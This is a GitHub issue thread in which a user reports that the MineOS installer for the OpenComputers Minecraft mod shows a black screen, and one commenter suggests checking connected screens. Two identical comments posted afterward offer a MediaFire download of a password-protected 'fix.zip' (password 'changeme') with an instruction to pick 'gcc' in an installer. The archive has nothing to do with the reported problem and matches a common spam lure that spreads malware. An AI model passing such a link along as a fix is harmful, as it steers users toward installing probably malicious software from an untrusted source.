### ISSUE TITLE
Problem with giant screens

### ISSUE THREAD

**Issue by tester5454** [IgorTimofeev/MineOS#642]
**Describe the bug**
So the openOS floppy worked fine so it's not a problem from the mod. But when i try to boot into the MineOS Installer i see a split second of the mineOS bootup screen then it goes Black
**Expected behavior**
Display probably
**Screenshots**

https://github.com/user-attachments/assets/bcc12cc9-b312-426f-a68c-e142bf0acdc2

**Minecraft and OpenComputers version**
1.12.2 for Minecraft
1.8.9 for OpenComputers

**Comment by Smok1e** [comment]
Seems like you have more than one monitor connected to your computer. Boot to OpenOS and look for output of `components | grep screen` command

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
